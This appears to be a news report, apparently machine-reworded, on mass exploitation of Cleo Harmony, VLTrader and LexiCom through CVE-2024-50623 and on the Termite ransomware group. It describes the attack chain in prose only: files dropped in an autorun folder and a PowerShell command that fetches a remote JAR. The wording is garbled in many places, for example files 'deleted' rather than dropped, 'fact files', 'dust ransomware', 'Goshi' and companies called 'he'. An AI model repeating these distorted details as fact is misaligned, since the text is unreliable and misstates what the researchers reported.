Users of file transfer software run by Cleo are advised to ensure that their copies do not end up on the Internet following reports of widespread exploitation of the vulnerability affecting fully patched systems.
Huntress Cyber Security Company said December 3, 2024 he found evidence that threat actors are massively exploiting the issue. The vulnerability affecting Cleo LexiCom, VLTransfer, and Harmony software relates to an unauthenticated remote code execution scenario.
There is security is tracked as CVE-2024-50623, with Cleo noting that the flaw is the result of an unrestricted file download that could open the way for arbitrary code execution.
The company, which is based in Illinois and has more than 4,200 customers worldwide, has since issued another advisory (CVE pending), a separate “unauthenticated malicious vulnerability that could lead to remote code execution” warning.
This development comes after Huntress said the patches released for CVE-2024-50623 did not fully mitigate the underlying software flaw. The issue affects the following products and is expected to be fixed later this week –
- Cleo Harmony (up to version 5.8.0.23)
- Cleo VLTrader (up to version 5.8.0.23)
- Cleo LexiCom (up to version 5.8.0.23)
In the attacks discovered by the cybersecurity company, it was discovered that the vulnerability is used to delete several files, including an XML file configured to execute a built-in PowerShell command responsible for retrieving the next stage Java Archive (JAR) file from a remote server.
Specifically, the intrusions use fact files placed in the “autorun” subdirectory of the installation folder, which are immediately read, interpreted, and evaluated by the vulnerable software.
At least 10 businesses had their Cleo servers hacked, with a spike in exploitation on December 8, 2024. around 7am UTC. Evidence gathered so far suggests that the earliest date for research is December 3, 2024.
Victim organizations include consumer goods companies, logistics and transportation organizations, and food suppliers. Users are advised to ensure that their software is updated to be protected against the threat.
Ransomware groups like Cl0p (aka Lace Tempest) have earlier aimed on different managed file transfer tools in the past, and it seems the latest attack is no different.
According to a security researcher Kevin Beaumont (aka GossiTheDog), “Termite ransomware group operators (and possibly other groups) have zero-day exploits for Cleo LexiCom, VLTransfer, and Harmony.”
Rapid7 Cyber Security Company said he also confirmed the successful use of the Cleo issue against customers. It should be noted that Termite has took responsibility for the recent cyberattack on supply firm Blue Yonder.
Broadcom Symantec Threat Hunter Team told The Hacker News that “Termite appears to be using a modified version dust ransomware that, when run on a machine, encrypts target files and adds a .termite extension”.
“Since we saw that Blue Yonder had a copy of Cleo software exposed to the internet via Shodan, and Termite named Blue Yonder among their victims, which was also confirmed by their list and open file directory, I’d say that Goshi is correct in a statement,” Jamie Levy, Huntress’ Director of Adversary Tactics, told the publication.
“For what it’s worth, there has been some rumblings that Termite may be the new Cl0p, there is some data that seems to support that as Cl0p activity has decreased and Termite activity has increased. They also work in a similar way. We’re not really in the attribution game, but it wouldn’t be totally surprising if we see a change in these extortion gangs at the moment.”
(This is a developing story. Please check back for more updates.)
